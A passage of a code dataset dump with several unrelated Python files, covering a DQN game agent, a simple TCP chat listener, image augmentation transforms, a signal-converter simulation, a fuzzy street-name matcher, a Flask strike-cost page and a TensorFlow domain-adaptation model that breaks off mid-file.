model.add(Conv2D(data_format=\"channels_last\",\n filters=64, kernel_size=(3,3), strides=(1,1),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n \n model.add(Flatten(data_format=\"channels_last\"))\n \n model.add(Dense(units=512, activation=\"relu\",\n kernel_initializer=kernel_initializer,\n bias_initializer = bias_initializer))\n \n # None activation is same as linear activation\n model.add(Dense(units=self.actions_dim, activation=None,\n kernel_initializer=kernel_initializer,\n bias_initializer = bias_initializer))\n \n optimizer = keras.optimizers.RMSprop(learning_rate=self.learning_rate, rho=0.99)\n \n model.compile(loss=\"mse\", optimizer=optimizer)\n \n return model\n \n\n def memorize(self, state, action, reward, done, next_state):\n\n transition = np.hstack((np.reshape(state, [-1]), [action, reward, int(done)], np.reshape(next_state, [-1])))\n index = self.memory_counter % self.memory_len \n 
self.memory[index,:] = transition\n self.memory_counter +=1\n \n def learn_from_memory(self):\n\n if self.memory_counter > self.memory_len: \n sample_indices = np.random.choice(self.memory_len, size=self.batch_size, replace=False)\n else: \n sample_indices = np.random.choice(self.memory_counter, size=self.batch_size)\n\n minibatch = self.memory[sample_indices, :]\n states_shape = [self.batch_size] + [dim for dim in self.state_dim] # [batch_size, 84, 84, 4]\n \n states = np.reshape(minibatch[:,:self.n_features], newshape=states_shape)\n actions = minibatch[:,self.n_features].astype(int)\n rewards = minibatch[:,self.n_features +1]\n done = minibatch[:, self.n_features + 2]\n next_states = np.reshape(minibatch[:,-self.n_features:], newshape=states_shape)\n \n q_new = self.model_eval.predict(states)\n q_old = self.model_target.predict(next_states)\n q_target = q_new.copy() \n \n # gets list of indices 0 to batchsize\n batch_indices = np.arange(self.batch_size, dtype=np.int32) \n\n selected_q_old = np.max(q_old, axis=1)\n\n q_target[batch_indices,actions] = rewards + (1-done) * self.gamma * selected_q_old\n \n self.model_eval.fit(states, q_target, epochs=1, verbose=0)\n \n\n def decay_epsilon(self):\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n def train_agent(self, total_episodes=18000, epsilon_decay=0.9998, render = False, save_weights=False):\n print(\"Now training\", self.agent_name)\n\n self.epsilon = 1.0\n self.epsilon_decay = epsilon_decay\n\n self.hist_rewards = []\n self.hist_epsilon_values = []\n\n\n start_time = time.time()\n for episode in range(1, total_episodes+1):\n \n done = False\n state = self.env.reset()\n reward_every_episode = 0\n \n while not done:\n\n if render:\n self.env.render()\n\n action = self.take_action(state) \n next_state, reward, done, info = self.env.step(action)\n reward_every_episode += reward\n \n self.memorize(state, action, reward, done, next_state)\n \n state = next_state\n\n if episode > self.start_after:\n self.epsilon = self.epsilon*self.epsilon_decay\n if episode % self.learn_cycle == 0:\n self.learn_from_memory()\n \n if episode % self.update_cycle == 0:\n self.model_target.set_weights(self.model_eval.get_weights())\n \n self.hist_rewards.append(reward_every_episode)\n self.hist_epsilon_values.append(self.epsilon)\n\n if save_weights and (episode % self.save_weights_cycle == 0):\n self.model_eval.save_weights(self.model_eval_path + str(episode) +\".h5\")\n self.model_target.save_weights(self.model_target_path + str(episode) +\".h5\")\n\n time_spent = time.time() - start_time\n print('Episode: %i/%i, Episode Reward: %i, Epsilon: %.5f, Time Spent: %i hours %i minutes' % \n (episode, total_episodes, reward_every_episode, self.epsilon , int((time_spent/60)/60), int((time_spent/60)%60)), end=\"\\r\")\n print(\"\\nTraining of\", self.agent_name, \"completed.\")\n\n def take_action(self, state, test=True): \n if (np.random.uniform() <= self.epsilon):\n return np.random.randint(0, self.actions_dim)\n else:\n state = np.expand_dims(state, axis=0)\n actions_value = self.model_eval.predict(state)\n return np.argmax(actions_value)\n \n def test_agent(self, runs = 30, render = False):\n \n self.epsilon = 0\n best_score = 0\n\n for run in range(1, runs+1):\n\n done = False\n state = self.env.reset()\n cur_score = 0\n\n while not done:\n if render:\n self.env.render()\n action = self.take_action(state) \n next_state, reward, done, info = self.env.step(action)\n cur_score += reward\n state = next_state\n print(\"Agent: %s \\t Run: 
%i/%i | Score: %i\" % (self.agent_name, run, runs, cur_score), end=\"\\r\")\n \n best_score = best_score if best_score>cur_score else cur_score\n\n print(\"\\n%s Agent's High Score in %i runs: %i \" %(self.agent_name, runs, best_score))\n \n def set_model_weights(self, e_num):\n self.model_eval.load_weights(self.model_eval_path+str(e_num)+\".h5\")\n self.model_target.load_weights(self.model_target_path+str(e_num)+\".h5\")\n \n def test_runs_progressive(self, e_nums, episodes = 10, rend = True):\n for e_num in e_nums:\n print(\"weights at:\",e_num)\n self.set_model_weights(e_num)\n self.test_agent()","sub_path":"Final code/agents/dqn_agent_5c.py","file_name":"dqn_agent_5c.py","file_ext":"py","file_size_in_byte":9017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"463516595","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 6 10:17:08 2018\n\n@author: li\n\"\"\"\n\nimport socket\nbind_ip = \"10.42.0.1\"\nbind_port = 9999\n\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nserver.bind((bind_ip,bind_port))\n#表示最多建立5个连接\nserver.listen(5)\ntry:\n while True:\n client,add = server.accept()\n print (\"[*]你监听的是:%s:%d\" % (add[0],add[1]))\n while True:\n data = client.recv(1024)\n if not data:\n break\n print(data)\n data = input('> ')\n client.send(data)\n# print data\n else:\n client.close()\nexcept Exception as e:\n print(e)\nserver.close()","sub_path":"tcp_host.py","file_name":"tcp_host.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"132352063","text":"import sys\nwith open(sys.argv[1],'r') as myfile:\n data = myfile.read()\norigList = data.split()\nresultList=[]\nnum = 0\nfor i in origList:\n location=-1\n for j in resultList:\n if i == j :\n location = resultList.index(j)\n if location==-1 :\n resultList.append(i)\n resultList.append(num)\n resultList.append(1)\n num = num + 1\n else:\n resultList[location+2] = resultList[location+2]+1\nnowLoc=0\nans = ''\nfor i in resultList:\n if nowLoc % 3 == 0:\n ans+=(str(i))\n ans+=(' ')\n nowLoc = nowLoc+1;\n elif nowLoc % 3 == 1:\n ans+=(str(i))\n ans+=(' ')\n nowLoc+=1\n elif nowLoc != 3*num-1:\n ans+=(str(i))\n ans+=(\"\\n\")\n nowLoc+=1\n else:\n ans+=(str(i))\nwith open(\"Q1.txt\",\"w\") as output:\n output.write(ans)\n","sub_path":"hw0/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"115170812","text":"import numpy as np\nimport torch\nfrom torchvision.transforms import ColorJitter, Resize, Normalize\nfrom PIL import Image\n\n# ------------------------------------------------------------------------------\n# Image Resize\n# ------------------------------------------------------------------------------\nclass ImageResize(object):\n \"\"\"Resize image and targets to specified size.\n \"\"\"\n\n # --------------------------------------------------------------------------\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n \n self.tform = Resize(self.output_size)\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"\n Random contextual image crop to desired image size.\n \"\"\"\n 
image = inputs['image']\n H, W = image.shape[:2]\n rois = inputs['ROI']\n image = self.tform.__call__(Image.fromarray(image))\n image = np.array(image)\n \n # Resize ROIs:\n scale = self.output_size / np.array([H,W], dtype=np.float)\n scale = np.tile(scale, 2)\n rois[:,:4] = scale * rois[:,:4]\n rois = np.round(rois)\n \n return {'image': image, 'ROI': rois}\n \n# ------------------------------------------------------------------------------\n# Randomized Image Crop\n# ------------------------------------------------------------------------------\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n border_size (tuple or int): Desired crop border size. If int, square crop is made.\n \"\"\"\n\n # --------------------------------------------------------------------------\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"\n Random contextual image crop to desired image size.\n \"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n H, W = image.shape[:2]\n \n # Contextual aware crop: Crop to maximally retain ROIs.\n # Identify the region containing the ROIs and crop outside this \n # region.\n roi_top = np.amin(rois[:,0:2], axis=0)\n roi_left = np.amax(rois[:,2:4], axis=0)\n \n region = np.zeros(4, dtype=int)\n \n # Sample row indices:\n if H - roi_left[0] < roi_top[0] + 1:\n # ROIs closer to the lower edge. Sample the y2 region location.\n regend = min(max(roi_left[0], self.output_size[0])+1, H-1)\n region[2] = np.random.randint(regend, H)\n region[0] = region[2] - self.output_size[0] + 1\n else:\n # ROIs closer to the upper edge. Sample the y1 region location.\n regstart = max(min(roi_top[0], H-self.output_size[0]), 1)\n region[0] = np.random.randint(0, regstart)\n region[2] = region[0] + self.output_size[0] - 1\n \n # Sample col indices:\n if W - roi_left[1] < roi_top[1] + 1:\n # ROIs closer to the right edge. Sample the x2 region location.\n regend = min(max(roi_left[1], self.output_size[1])+1, W-1)\n region[3] = np.random.randint(regend, W)\n region[1] = region[3] - self.output_size[1] + 1\n else:\n # ROIs closer to the left edge. 
Sample the x1 region location.\n regstart = max(min(roi_top[1], W-self.output_size[1]), 1)\n region[1] = np.random.randint(0, regstart)\n region[3] = region[1] + self.output_size[1] - 1\n \n # Crop image at sampled region:\n image = image[region[0]:region[2]+1, region[1]:region[3]+1]\n\n # Adjust ROI locations to image origin shift and only retain the ones \n # that fit inside the cropped region.\n rois[:,:4] = rois[:,:4] - np.tile(region[:2], 2)\n keep = np.all((rois[:,:4] >= 0) & \n (rois[:,:4] < np.tile(self.output_size, 2)), axis=1)\n rois = rois[keep,:]\n\n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Randomized Image Horizontal Flip\n# ------------------------------------------------------------------------------\nclass RandomHorizontalFlip(object):\n \"\"\"Flip input image horizontally at random with a probability of 0.5\"\"\"\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"Random image flip along Y axis\"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n \n if np.random.random_sample() > 0.5:\n # Flip if the sample drawn is larger than 0.5 in a uniform \n # distribution range of [0. 1.)\n image = np.fliplr(image).copy()\n \n # Convert ROI coordinates:\n rois[:, [1,3]] = image.shape[1]-1 - rois[:, [3,1]]\n\n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Randomized Image Vertical Flip\n# ------------------------------------------------------------------------------\nclass RandomVerticalFlip(object):\n \"\"\"Flip input image vertically at random with a probability of 0.5\"\"\"\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"Random image flip along X axis\"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n \n if np.random.random_sample() > 0.5:\n # Flip if the sample drawn is larger than 0.5 in a uniform \n # distribution range of [0. 
1.)\n image = np.flipud(image).copy()\n \n # Convert ROI coordinates:\n rois[:, [0,2]] = image.shape[0]-1 - rois[:, [2,0]]\n\n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Randomized Image Horizontal Flip\n# ------------------------------------------------------------------------------\nclass JitterColor(object):\n \"\"\"Wrapper around ColorJitter to handle target transformation\"\"\"\n\n # --------------------------------------------------------------------------\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n self.tform = ColorJitter(brightness=brightness,\n contrast=contrast,\n saturation=saturation,\n hue=hue)\n \n def __call__(self, inputs):\n \"\"\"Calls colorjitter transform, np-op on targets\"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n image = self.tform.__call__(Image.fromarray(image))\n image = np.array(image)\n \n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Converts sample image and bounding boxes to tensors.\n# ------------------------------------------------------------------------------\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n \n # --------------------------------------------------------------------------\n def __init__(self, device='cpu'):\n self.device = device\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = inputs['image']\n image = torch.from_numpy(image).to(self.device)\n image = image.permute((2, 0, 1))\n rois = inputs['ROI']\n rois = torch.from_numpy(rois).to(self.device)\n \n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Normalize image to unit normal intensities\n# ------------------------------------------------------------------------------\nclass NormalizeIntensity(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n \n # --------------------------------------------------------------------------\n def __init__(self, mean, std):\n self.Mean = mean\n self.Std = std\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n # Normalize to zero-mean normal intensities:\n image = inputs['image'].float()\n rois = inputs['ROI']\n for n in range(image.size(0)):\n image[n,:,:] = (image[n,:,:] - self.Mean) / self.Std\n \n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n","sub_path":"model/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157412820","text":"def solution(n, arr1, arr2):\n answer = []\n\n for i in range(n):\n # 2진수로 변환하는 방법, str로 처리됨\n arr1[i] = format(arr1[i], 'b')\n arr2[i] = format(arr2[i], 'b')\n\n # 변환된 2진수가 n의 길이보다 짧을경우에는 0으로 채워준다\n arr1[i] = ('0' * (n - len(arr1[i]))) + arr1[i]\n arr2[i] = ('0' * (n - len(arr2[i]))) + arr2[i]\n\n pattern = \"\"\n\n for j in range(n): # 이렇게 해줘야 str내 
숫자를 1개씩 가져옴 ex) arr1[0]: 01001 / arr1[0][0]: 01001 중 0을 가져옴\n if arr1[i][j] == '1' or arr2[i][j] == '1':\n pattern += '#'\n\n else:\n pattern += ' '\n\n answer.append(pattern)\n return answer","sub_path":"JE/9주차/SecretMap.py","file_name":"SecretMap.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"543279530","text":"from __future__ import absolute_import\n\nimport os\nimport tempfile\n\nfrom celery import shared_task\nfrom PIL import Image as PILImage\n\nfrom betty.conf.app import settings\n\nfrom .dssim import detect_optimal_quality\ntry:\n import numpy\n import scipy\n IMGMIN_DISABLED = False\nexcept ImportError:\n IMGMIN_DISABLED = True\n\n\ndef is_optimized(image):\n \"\"\"Checks if the image is already optimized\n\n For our purposes, we check to see if the existing file will be smaller than\n a version saved at the default quality (80).\"\"\"\n\n im = PILImage.open(image.source.path)\n icc_profile = im.info.get(\"icc_profile\")\n\n # First, let's check to make sure that this image isn't already an optimized JPEG\n if im.format == \"JPEG\":\n fd, optimized_path = tempfile.mkstemp()\n im.save(\n optimized_path,\n format=\"JPEG\",\n quality=settings.BETTY_DEFAULT_JPEG_QUALITY,\n icc_profile=icc_profile,\n optimize=True)\n os.close(fd)\n if os.stat(image.source.path).st_size < os.stat(optimized_path).st_size:\n # Looks like the original was already compressed, let's bail.\n return True\n\n return False\n\n\n@shared_task\ndef search_image_quality(image_id):\n if IMGMIN_DISABLED:\n return\n\n from betty.cropper.models import Image\n\n image = Image.objects.get(id=image_id)\n\n if is_optimized(image):\n # If the image is already optimized, let's leave this alone...\n return\n\n image.jpeg_quality_settings = {}\n last_width = 0\n for width in sorted(settings.BETTY_WIDTHS, reverse=True):\n\n if abs(last_width - width) < 100:\n # Sometimes the widths are really too close. 
We only need to check every 100 px\n continue\n\n if width > 0:\n quality = detect_optimal_quality(image.optimized.path, width)\n image.jpeg_quality_settings[width] = quality\n\n if quality == settings.BETTY_JPEG_QUALITY_RANGE[-1]:\n # We'are already at max...\n break\n\n last_width = width\n\n image.clear_crops()\n image.save()\n","sub_path":"betty/cropper/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"474398029","text":"from keras.applications import ResNet50\nfrom keras.models import Model\nimport keras.backend as K\nfrom keras.layers import (Conv2D, LeakyReLU, Input, BatchNormalization, Add,\n MaxPooling2D, Lambda, concatenate, Conv3D, Dropout,\n Activation, Flatten, Dense, GlobalAveragePooling2D)\nfrom keras.regularizers import l1_l2\n\nfrom .neural_layers import residual_block, bilinear_resize, expand_dims, residual_stage\n\ndef create_network(input_shape, prior, L1=0, L2=0, dropout=0, KERNEL_NUM=64):\n inp = Input(shape=input_shape)\n\n x = Conv2D(KERNEL_NUM, 5, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(inp)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(2*KERNEL_NUM, 5, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(4*KERNEL_NUM, 5, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(8*KERNEL_NUM, 3, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(16*KERNEL_NUM, 3, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(KERNEL_NUM, 28, strides=28, kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(8, 1, activation='sigmoid', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n return Model(inp, x)\n","sub_path":"Models/no_reduction_no_prior.py","file_name":"no_reduction_no_prior.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"563295470","text":"# -*- coding: utf-8 -*-\n\nfrom color import Color\nfrom component import Component\nfrom componenttypes import TYPE_SIM_DISCRETE, SIM_INIT, SIM_UPDATE\nfrom lib.pseqt import * # @UnusedWildImport\nfrom terminal import TERM\n\n\nclass Adc(Component):\n '''!\n @if English\n\n Unipolar or bipolar A/D Convertor.\n\n @endif\n\n @if Slovak\n\n Unipolarny / bipolarny analogovo-digitalny prevodnik s nastavitelnym\n rozlisenim.\n\n @endif\n '''\n\n def __init__(self, name, pos):\n Component.__init__(self, name, pos)\n\n self.compType = TYPE_SIM_DISCRETE\n self.shapeImage = 'adc.svg'\n self.box = QRectF(-30, -30, 60, 60)\n self.shapeColor = Color.black\n\n self.addParameter('Vref H', 1, False, QPointF(40, 30), Color.black, True)\n self.addParameter('Vref L', -1, False, QPointF(40, 30), Color.black, True)\n self.addParameter('Resolution', 6, False, QPointF(40, 30), Color.black, True)\n\n self.addTerminal('IN', 1, TERM.IN, QPointF(-30, 0), TERM.DIR_EAST, TERM.IN_ARROW_SMALL_FILL, TERM.IN_ARROW_SMALL)\n self.addTerminal('OUT', 2, TERM.OUT, QPointF(30, 0), TERM.DIR_EAST, TERM.OUT_ARROW_SMALL_FILL, TERM.OUT_ARROW_SMALL)\n\n term = self.addTerminal('CLOCK', 3, TERM.IN, QPointF(0, -25), TERM.DIR_SOUTH, TERM.OUT_ARROW_SMALL_FILL, TERM.OUT_ARROW_SMALL)\n 
term.termDiscColor = Color.red\n term.termConnColor = Color.red\n term.termConnFill = Color.red\n\n self.bit = 1.0\n\n def updateShape(self):\n super(Adc, self).updateShape()\n\n # kontrola Vh, Vl, rozlisenia\n if self.parameter['Vref H'].value < self.parameter['Vref L'].value:\n self.parameter['Vref H'].value = 1.0\n self.parameter['Vref L'].value = -1.0\n\n if self.parameter['Resolution'].value < 1:\n self.parameter['Resolution'].value = 1\n\n vh = self.parameter['Vref H'].value\n vl = self.parameter['Vref L'].value\n nb = self.parameter['Resolution'].value\n\n self.bit = (vh - vl) / float(pow(2, nb))\n\n def drawShape(self, gc):\n gc.setPen(QPen(self.shapeColor, 0.6))\n grad = QLinearGradient(0, -25, 0, 50)\n grad.setColorAt(0, Color.white)\n grad.setColorAt(1, Color.khaki)\n gc.setBrush(QBrush(grad))\n gc.drawRoundedRect(-25, -25, 50, 50, 5, 5)\n\n self.drawIcon(gc, -20, -20)\n\n font = QFont('Decorative', 8)\n font.setItalic(True)\n gc.setFont(font)\n gc.setPen(QPen(Color.red, 1))\n gc.drawText(QRectF(-10, -10, 20, 20), Qt.AlignHCenter | Qt.AlignVCenter, str(self.parameter['Resolution'].value))\n\n def sim(self, flag, value, time, step):\n if flag == SIM_INIT:\n self.terminal[2].value = 0\n\n elif flag == SIM_UPDATE:\n # pri externom clocku je hodnota prevedena len v stave clock=1\n # inak v kazdom kroku\n\n if self.terminal[3].value < 1:\n return\n\n vh = self.parameter['Vref H'].value\n vl = self.parameter['Vref L'].value\n #nb = self.parameter['Resolution'].value\n #bit = (vh - vl) / float(pow(2, nb))\n inp = self.terminal[1].value # vstupna analogova hodnota,\n\n # saturacia\n if inp >= vh:\n inp = vh\n\n if inp <= vl:\n inp = vl\n\n out = (inp - vl + self.bit / 2) / self.bit\n self.terminal[2].value = int(out)\n","sub_path":"src/lib/discrete/ad_converter.py","file_name":"ad_converter.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"231562795","text":"import Levenshtein\nimport pickle\nimport io\nimport csv\n\n\ndef loadDictionary(nameDictionary):\n global dictVieVereAllCombinations\n with open(nameDictionary, 'rb') as handle:\n dictVieVereAllCombinations = pickle.load(handle)\n\ndef rapidSearchInDbCiviciTorino(viaDaUtente):\n global maxAbs\n global result\n \"cerca la via fornita dall'utente nel db delle vie di Torino \"\n for k, v in dictVieVereAllCombinations.items():\n maxVToken = 0\n # print(k)\n # if(k == \"VIA VINCENZO GIOBERTI\"):\n # print()\n for token in v:\n\n strConcatenata = \"\"\n strConcatenata = strConcatenata.join(elem for elem in token)\n value = Levenshtein.ratio(strConcatenata, str)\n if (value > maxVToken):\n maxVToken = value\n\n if (maxVToken > maxAbs):\n maxAbs = maxVToken\n result = k\n #print(f'{k},{maxVToken}')\n return;\n\ndef searchInDbCiviciTorino(viaDaUtente):\n tokenDaViaDaUtente = viaDaUtente.split()\n lenTokenDaViaDaUtente = len(tokenDaViaDaUtente)\n viaNoSpace = viaDaUtente.replace(\" \", \"\")\n global maxAbs\n global result\n \"cerca la via fornita dall'utente nel db delle vie di Torino \"\n for k, v in dictVieVereAllCombinations.items():\n maxVToken = 0\n # print(k)\n if(k == \"VIA GIOVANNI SEGANTINI\"):\n print()\n for token in v:\n lenToken = len(token) # quanti token ci sono nel compione per il confronto\n if(maxVToken != 1):\n if(lenTokenDaViaDaUtente == lenToken):\n strConcatenata = \"\"\n strConcatenata = strConcatenata.join(elem for elem in token)\n\n value = Levenshtein.ratio(strConcatenata, viaNoSpace)\n if (value > maxVToken):\n 
maxVToken = value\n\n if (maxVToken > maxAbs):\n maxAbs = maxVToken\n result = k\n #print(f'{k},{maxVToken}')\n return;\n\n#carico il dictionary con dentro i dati Key:Value ---- Via : lista(tutte le possibili permutazioni delle parole che compongno la via)\nloadDictionary('filename.pickle')\n\n\nstr = \"CORSO TOSCANA 16\"\n\nitemsParole = str.split()\n\n\n#definisco le variabili per trovare il valore di similaruta' massima e il rseult\nmaxAbs = 0 #value della similarità massima\nresult = \"\" #la via che cerco\n\nsearchInDbCiviciTorino(str) #chiamo la funzione per cercare in tutte la via in tutte le vie del db\nprint(\"result: \"+result)\nprint(maxAbs)\nmaxAbs=0\nrapidSearchInDbCiviciTorino(str)\n\nprint(f'original {str}-------> {result},{maxAbs}')\n\n\n#print(\"lunghezza db: \"+len(dictVieVereAllCombinations))\n\n\n\n'''for val in reader:\n value = Levenshtein.ratio(val[0], \"VIA GIOBERTI\")\n print(val[0] + \",\" + str(value))\n # print(value)\n if value > maxv:\n maxv = value\n correct = val[0]\n'''\n","sub_path":"LevenshteinSimilarityTest1Func.py","file_name":"LevenshteinSimilarityTest1Func.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"206571523","text":"#===============================================================================\n# __init__.py\n#===============================================================================\n\n\"\"\"Initialization\n\nThis file contains the application factory for the okscope app.\n\"\"\"\n\n\n\n\n# Imports ======================================================================\n\nimport os\nfrom datetime import datetime\nfrom numpy import busday_count\nfrom flask import Flask, render_template, url_for\n\n\n\n\n# Functions ====================================================================\n\ndef total_spent(\n per_day: int = 300_000,\n cola_year: int = (1412 * 12),\n strike_start: str = '2020-02-10',\n today: str = datetime.today().strftime('%Y-%m-%d'),\n holidays: int = 1,\n total_grads: int = 1977\n):\n days = busday_count(strike_start, today) - holidays\n total = days * per_day\n millions = f'{(total / 1e6):.1f}'\n cola_years = int(round(total / cola_year))\n percent_grads = int(round(cola_years / total_grads * 100))\n return millions, cola_years, total_grads, percent_grads\n\n\ndef create_app(test_config=None):\n \"\"\"The application factory function\n\n This function creates and configures the Flask application object. For\n more on application factories, see the Flask documentation/tutorial:\n\n http://flask.pocoo.org/docs/1.0/tutorial/factory/\n\n http://flask.pocoo.org/docs/1.0/patterns/appfactories/\n\n Parameters\n ----------\n test_config : dict\n A dictionary containing configuration parameters for use during unit\n testing. 
If this parameter is `None`, the configuration will be loaded\n from `config.py` in the instance folder.\n\n Returns\n -------\n Flask\n A flask app\n \"\"\"\n\n app = Flask(__name__, instance_relative_config=True)\n \n if test_config is None:\n app.config.from_pyfile('config.py', silent=True)\n else:\n app.config.from_mapping(test_config)\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n \n @app.route('/')\n def index():\n millions, cola_years, total_grads, percent_grads = total_spent(\n today=datetime.today().strftime('%Y-%m-%d')\n )\n return render_template(\n 'index.html',\n nav_button=\"About\",\n url=url_for('about'),\n millions=millions,\n cola_years=cola_years,\n total_grads=total_grads,\n percent_grads=percent_grads\n )\n \n @app.route('/about')\n def about():\n return render_template('about.html', nav_button=\"Back\", url=url_for('index'))\n \n return app\n","sub_path":"cola_years/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"434438086","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\ndef shuffle_data(data, label):\n \"\"\"Shuffle permutation of data.\"\"\"\n num = data.shape[0]\n p = np.random.permutation(num)\n return (data[p,:], label[p,:])\n\n\ndef batch_generator(data, label, batch_size, shuffle=True):\n \"\"\"Generate batches of data.\n \n Given a list of array-like objects, generate batches of a given\n size by yielding a list of array-like objects .\n \"\"\"\n \n if shuffle:\n data, label = shuffle_data(data, label)\n\n batch_count = 0\n while True:\n if batch_count * batch_size + batch_size >= data.shape[0]:\n batch_count = 0\n\n if shuffle:\n data, label = shuffle_data(data, label)\n\n start = batch_count * batch_size\n end = start + batch_size\n batch_count += 1\n yield (data[start:end,:], label[start:end,:])\n\n\nclass MCD_DA():\n def __init__(self):\n pass\n\n def weight_variable(self, name, shape):\n initializer = tf.truncated_normal_initializer(mean = 0.0, stddev = 0.01, dtype = tf.float32)\n return tf.get_variable(name, shape, initializer = initializer)\n\n def bias_variable(self, name, shape):\n initializer = tf.constant_initializer(value = 0.0, dtype = tf.float32)\n return tf.get_variable(name, shape, initializer = initializer)\n\n def alpha_variable(self, name):\n initializer = tf.constant_initializer(value = 0.75, dtype = tf.float32)\n return tf.get_variable(name, shape = (), initializer = initializer)\n\n def generator(self, x, filter_size, n_filters_1, n_filters_2, n_filters_3, n_units, keep_prob, reuse = False):\n x_reshaped = tf.reshape(x, [-1, 32, 32, 1])\n\n with tf.variable_scope('generator', reuse = reuse):\n w_1 = self.weight_variable('w_1', [filter_size, filter_size, 1, n_filters_1])\n b_1 = self.bias_variable('b_1', [n_filters_1])\n\n # conv1\n conv1 = tf.nn.conv2d(x_reshaped, w_1, strides = [1, 1, 1, 1], padding = 'SAME') +b_1\n\n # batch norm 1\n batch_mean_1, batch_var_1 = tf.nn.moments(conv1, [0, 1, 2])\n conv1 = (conv1 - batch_mean_1) / (tf.sqrt(batch_var_1) + 1e-5)\n\n # relu\n conv1 = tf.nn.relu(conv1)\n\n # max_pool_1\n conv1 = tf.nn.max_pool(conv1, ksize = [1, 3, 3, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n\n \n w_2 = self.weight_variable('w_2', [filter_size, filter_size, n_filters_1, n_filters_2])\n b_2 = self.bias_variable('b_2', [n_filters_2])\n\n # conv2\n conv2 = 
